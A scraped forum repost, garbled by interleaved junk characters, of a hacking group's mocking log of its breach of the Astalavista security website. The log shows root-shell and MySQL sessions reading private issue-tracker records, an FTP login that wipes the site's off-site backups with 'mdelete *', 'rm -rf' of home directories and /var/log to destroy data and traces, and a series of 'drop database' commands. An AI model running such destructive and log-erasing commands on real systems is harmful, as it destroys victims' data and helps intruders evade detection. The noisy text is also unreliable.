8 h( g& B$ I" Y# t1 w) w/ |$ IOne example a friend of mine from coresecurity.com!
4 k8 o+ y- P! l8 A5 s2 _9 ^% t0 y2 s- M" k
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 l- \) A5 ]: C$ h) j6 n9 \+ }
3 M% |# `/ n6 @$ H
|) j6 l% t( v6 \, M
+————————+——————————————————————————————————————————————————————————————————————————————+
4 J9 D$ n1 e9 @: J1 F* h4 o1 row in set (0.00 sec)
( {0 ]. v9 M: d
( P: c0 J; t, C3 D% G2 z) v6 J// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…  O% I, q+ M- ~( r/ I$ _

" W# G3 x; L5 V' Bmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
$ t5 _  z. J6 G+ T2 r; P" ~- z+——————+———————————————————————————————+
8 f2 S* O2 D& Q| iss_summary      | iss_description                                                                             |+ w/ [: C6 w1 v
+——————+———————————————————————————————+* ~4 b* q9 n8 B, Y) U" \* A
| Website guidance | Virtual Girl which guides you trought the website.
0 p. |$ \( a/ k3 z
  e! J- M1 [  [% d. c8 t6 iWe need a girl with who you can ( talk )!!!
/ g" Y' |) n5 f; nAlso for the News!) F( P5 z' u/ y( i
So my suggestion is a girl who read you the news loud if you like!
% y; n. w( ^, C! k* vyou can choose between read yourselfe or she read it for you or both!
( l$ k3 M( l( E8 B, A; L: V* B7 K% x. V% ~  ]1 f
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
. _  X: c2 l" Y8 D1 l; n
7 i" ^9 U7 V8 HHave a look on the example girls!!
& q2 t0 e" w7 e  K( g4 K% }$ R( k# [" ~, D9 }+ ~; b( e* U
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
8 Q6 i4 x* I8 A4 C* g1 X4 W' [) O
or that
% E5 Y( G$ K$ u9 y0 z7 n) f1 C% d+ x2 e
链接标记[url]http://www.yellostrom.de/[/url]* X7 L3 ]# K) _; C, s- u

' h1 Z! L. A& _6 {  c|
- e" U: r8 Z4 ?' W* O+——————+———————————————————————————————+
( U+ ]$ E7 Y  K; Q5 k6 M6 i1 row in set (0.00 sec)# h4 N$ R1 V8 ^5 {' C
; Z4 `4 \1 z6 ?+ C
// ha ha.$ N, r' R# P. V5 w

* v" Z9 U8 _" [6 z! i* b2 \mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;  V+ i5 @4 |1 \" U* y
+————————–+———————————————————————————————————–+1 H+ A0 B3 j8 [  ^1 [9 [$ p
| iss_summary              | iss_description                                                                                           |1 x/ }8 M  L7 f: o  t
+————————–+———————————————————————————————————–+
) u- w1 K: D+ |: v! n4 T| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |' Z. d6 e' j3 E+ h# V1 }3 n7 c
+————————–+———————————————————————————————————–+7 l2 s: Y9 d4 [. C) w; A* H9 ?
1 row in set (0.00 sec)
7 [! h% K1 K% P2 p9 y- x! j& K+ Z
' G: z5 v. B/ \5 j: l. T// LOL.
  P* u% k. q' _  Q" E' y7 p7 b0 Y5 y6 |) O/ ]5 q$ v: ~! W9 |
mysql> exit  o- Q! L- W* N/ i% g
Bye
8 [- j1 D4 ^$ f: L
( B% E* h& s& z/ K' M# L: a7 ash-3.2# ftp 212.254.194.163: C& M# T2 a* m- `. k
Connected to 212.254.194.163.( @8 m  D$ A# Z+ C4 q* R5 E
220 BackupCOM_VW FTP server ready.! m: L# C1 P, A; z
504 AUTH: security mechanism ‘GSSAPI’ not supported.
, r% R9 F! [8 ]8 w/ q504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
: {! `8 M# t, F( L3 EKERBEROS_V4 rejected as an authentication type9 I, `. L/ Z" @% O* B
Name (212.254.194.163:root): astalavista.com
6 @0 V2 u9 f8 o* a2 a: \: r331 Password required for astalavista.com.
6 `; \$ M8 P! \6 o6 a% F& Y0 ePassword:
; ]  ~9 Y; p1 J$ x% g8 Z  T; b2 w$ X230 User astalavista.com logged in.
/ S( X, ~6 F( r6 i7 ^' WRemote system type is UNIX.6 ^" z) U$ x) E! V" G' ^' M
Using binary mode to transfer files.
0 N: o9 M# X+ D0 P6 gftp> ls -la
9 U$ q  I8 `- H. _! W& s* @4 _: K227 Entering Passive Mode (212,254,194,163,2,188)& e9 P& Z; |2 V
150 Opening BINARY mode data connection for ‘file list’.
" z1 m" B. `/ N3 i, kdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
0 o; b" b5 |% n: h226 Transfer complete.
; a2 z/ L- [7 s1 Bftp> cd astalavista.com
! m, o! s  G' S4 |) G250 CWD command successful.
+ ?) q- Z* `& V6 v3 K8 kftp> ls -la, ^; t7 u2 o$ S$ O4 O
227 Entering Passive Mode (212,254,194,163,2,189)
! A5 _, W5 \% {: D150 Opening BINARY mode data connection for ‘file list’.: D, s& ^* d8 J+ j) @6 G7 y
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar6 N4 K/ g! }: z, E1 }* {+ K
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2" o& G5 y5 Z5 v) _
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
! p! m# E4 r4 e6 j  ^' O-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
  ?: Y; L* i8 J; K& W$ S: ~-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
9 ?* i( p5 V2 b+ U3 b+ G[snip]
! m7 O5 K: R/ B: v& ]226 Transfer complete.
4 }; [* B' \) y: e$ Zftp> mdelete *6 q/ U; y- S; o8 a; e
ftp> ls -la6 @+ h8 I/ [- u: o0 A: _
227 Entering Passive Mode (212,254,194,163,2,193)
, O0 x: g; t2 N/ h5 Z0 B; `150 Opening BINARY mode data connection for ‘file list’.
( C" P$ Q0 I6 ~' m226 Transfer complete.' ?) I, z. E- |& M
ftp>, }( S4 T- v0 u- l2 l- i$ y6 O# E* W
/ z) Q) `. O( p! a
sh-3.2# cd /home, o0 T; s  E5 I% v! |6 f
sh-3.2# ls -la
, @' K3 F. ?8 e4 p2 _7 [- ?total 120
% {/ P- d) z# w: O* jdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
1 }* [( Z6 v* ^, C) S' X+ {1 {drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
5 o. N1 O. x: G# q; n  Q* tdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin; ]) U: `* E( T  P5 Q+ `: x) A4 }
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group+ H: K' H+ a, u) g8 t! |- x
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
' K# M" @6 j4 y  V- rdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
9 H! Z1 C% S. _' F* ~drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
5 N. h( K) V1 Q; ?2 q9 }# r* s% gdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141617 ?! v- G# u: g1 k! [
drwx–x–x 10 com     com      4096 Apr 28 12:40 com; V) ~! C0 @0 X7 l& C3 A. V
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
5 ]% N: S, L, \3 T* _drwx——  3 jon     jon      4096 Sep 21  2007 jon; u: }: z9 d/ d
drwx——  2 root    root    16384 Sep 11  2007 lost+found' b2 o; s8 C+ H5 ~
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
/ N! O0 {- Z% B& r$ p" bdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
$ d7 {% }! w; J) R  T6 M7 Tdrwx——  2 jon     jon      4096 Sep 15  2007 test) {3 F/ j7 F) q( c# {0 a
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
% F, S7 Q0 y1 d$ o/ E' n
9 p4 \5 a% Z5 Jsh-3.2# rm -rf backup/
9 ?9 u! K% {0 U# K& \sh-3.2# rm -rf backup.14161/
% P. ~( |( o" w. ]sh-3.2# rm -rf ftp/
" G9 B. f5 G7 F/ |sh-3.2# rm -rf jon/: ~, H/ c& `/ N+ T! j
sh-3.2# rm -rf my/: i( i, f; T& i# e
sh-3.2# rm -rf mysqldata/7 z) j9 X& E/ c/ Q3 U$ J
sh-3.2# rm -rf test/
7 M. e' ?5 h& n0 A) ^* Ish-3.2# rm -rf tmp/# F! x/ ?. [* O7 y* G- s( R& e6 y
sh-3.2# cd ~" q1 ]) m, F4 H/ g$ J
sh-3.2# rm -rf *+ \. v' i1 ]( Y) [" M4 ^3 U
sh-3.2# rm -rf /var/log/
' L& F  Q6 B( t( \8 U. P6 drm: cannot remove directory `/var/log//proftpd’: Directory not empty  i8 M( w+ w" O9 g! S& |
sh-3.2# rm -rf /home/*2 t- q! O. y8 R( I* X* N
sh-3.2# mysql
+ \/ q- r" q1 \* G' w* l# E& uWelcome to the MySQL monitor.  Commands end with ; or \g.
( ?+ D. p" }9 m. q1 uYour MySQL connection id is 407156# Z/ |, U' e0 p9 W
Server version: 5.0.45-community-log MySQL Community Edition (GPL): ?, K  b  G$ p- l
- y; g( ?+ W1 a- [3 v/ {& V
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- k( f9 I# K, @
7 F6 E. X0 u0 _mysql> show databases;6 d' Z& }1 C  p5 \3 f+ [
+———————–+
3 [+ J* J: D% D8 M: e| Database              |
. D6 f  K  a0 u- l5 p/ S+———————–+6 |5 b3 R6 y1 i3 O) H, y
| information_schema    |
. r) l+ J4 x( N' E. S| astanet_ads           |4 y" O  l  c' x3 ]! s4 T, l
| astanet_mailing_lists |
! ]8 D3 _1 N$ E" u7 A| astanet_mediawiki     |, k, J8 R$ J2 k8 l5 n
| astanet_membersystem  |
& ]' \5 E3 r# @! V, s/ i& k' }| com_contrexx          |6 q7 ^% o3 u, L9 C3 z0 e" E
| com_contrexx2         |
: Y  ]/ \" V# D/ h| com_contrexx2_live    |" N/ |) u; g3 q4 N$ _
| da_roundcube          |: |8 o5 R0 V5 }4 [
| dolphin               |
/ H% D2 B( m1 L) A| ideapool              |. T& q1 z, G- v  t
| mysql                 |" p* M% E+ _4 o: [1 h
| test                  |* h8 b: k. J' p' l# s
| yourmaster            |
1 B: L5 v# B& e9 `  v+———————–+
8 H4 b4 I' ~* S9 g3 m14 rows in set (0.03 sec): a. I& e4 ]  E7 v; v$ q

4 Z6 ~% s0 I, R. g# A) c* j# amysql> drop database astanet_membersystem;8 m+ g2 @% R( ^5 C+ P
droQuery OK, 46 rows affected (0.81 sec)
6 z( n, b$ \" C+ O( c- ]
) S) r: k$ q$ @( cmysql> drop database com_contrexx;
8 z2 ?1 P6 M( i9 g) @Query OK, 211 rows affected (2.72 sec), e% v) T/ n) R3 H4 k8 f+ a

/ K, K; S& g/ g; u( r1 ^1 Xmysql> drop database com_contrexx2;
5 [; i# ?& \' Q/ a: FQuery OK, 237 rows affected (2.23 sec)
1 Z# c; q( z4 o% Y, C- U' t6 D3 V* f( j& ^# P4 Q, M$ {# B
mysql> drop database com_contrexx2_live;' w# p5 x, q1 _$ M  J6 ]3 ?) c
Query OK, 227 rows affected (7.63 sec)
; J, _7 B" q& C) V; R+ l; A) x( J; [+ H1 M1 M1 ]4 k: \; P" H1 I
mysql> drop database ideapool;
. ?. M- _2 ]4 m) i4 P, L( wQuery OK, 69 rows affected (0.19 sec)
( s- f: g& E4 b6 o9 `! W! Z# t9 {5 V2 b
mysql> drop database yourmaster;
/ U* J: N& F& oQuery OK, 158 rows affected (0.55 sec)% B$ w4 ~+ B& q$ {) c9 T
7 U, W- H9 n3 k  j7 }0 \: J
mysql> drop database astanet_ads;
5 J# [, `( W4 C1 X; NQuery OK, 9 rows affected (0.11 sec)& _' @3 `! b7 P0 e7 D4 e6 P, F5 ~2 j
/ _5 q& i! L* t. Z6 J& W; i0 r8 n& V
mysql> drop database astanet_mailing_lists;
8 F) A1 y3 e1 A) T8 Z3 `- z& eQuery OK, 24 rows affected (1.47 sec)2 m/ b& s2 a6 H9 G

; \% O# ^8 P6 p$ ]mysql> drop database astanet_mediawiki;
  ]2 z1 [! M* M# w5 F8 u" J. DQuery OK, 31 rows affected (0.51 sec)$ S0 u" R/ ^& U6 J/ `

5 i7 Y  B% Q1 e: V- emysql> show databases;
( G8 `- {9 n: ~" y3 X7 A+——————–+
8 s$ @1 |6 S$ G) w| Database           |" f8 T4 @1 c( o. y' X5 n. J7 ^
+——————–+
$ n8 B$ {- X' z; r5 [! c& q0 m| information_schema |! a, c" n+ o' [8 Q' \+ A
| da_roundcube       |
- N+ a% o5 c8 h  j! _1 u4 `| dolphin            |
& r: A/ `9 H6 \, ~. z# W: E% z| mysql              |7 y' |: S. X6 i9 r  A$ Z, d
| test               |
1 B& G* _. M/ j* l2 w5 b+——————–+% V$ q+ i0 t& V( g1 g3 H
5 rows in set (0.00 sec); x  ]6 n) L5 B0 h+ e8 \5 p* d

, v. F  o& C* h3 ?* L* PWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
" ^4 x9 F  b" W! T9 J3 ]their naming (conventions) but we’re sure Arnold himself wouldn’t be in the$ ]: X  c0 _" D( h  u7 m) x, o
wrong to say this pack of morons *wont be back*.
; F# r5 s4 s9 p. Z% y- V' U# ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表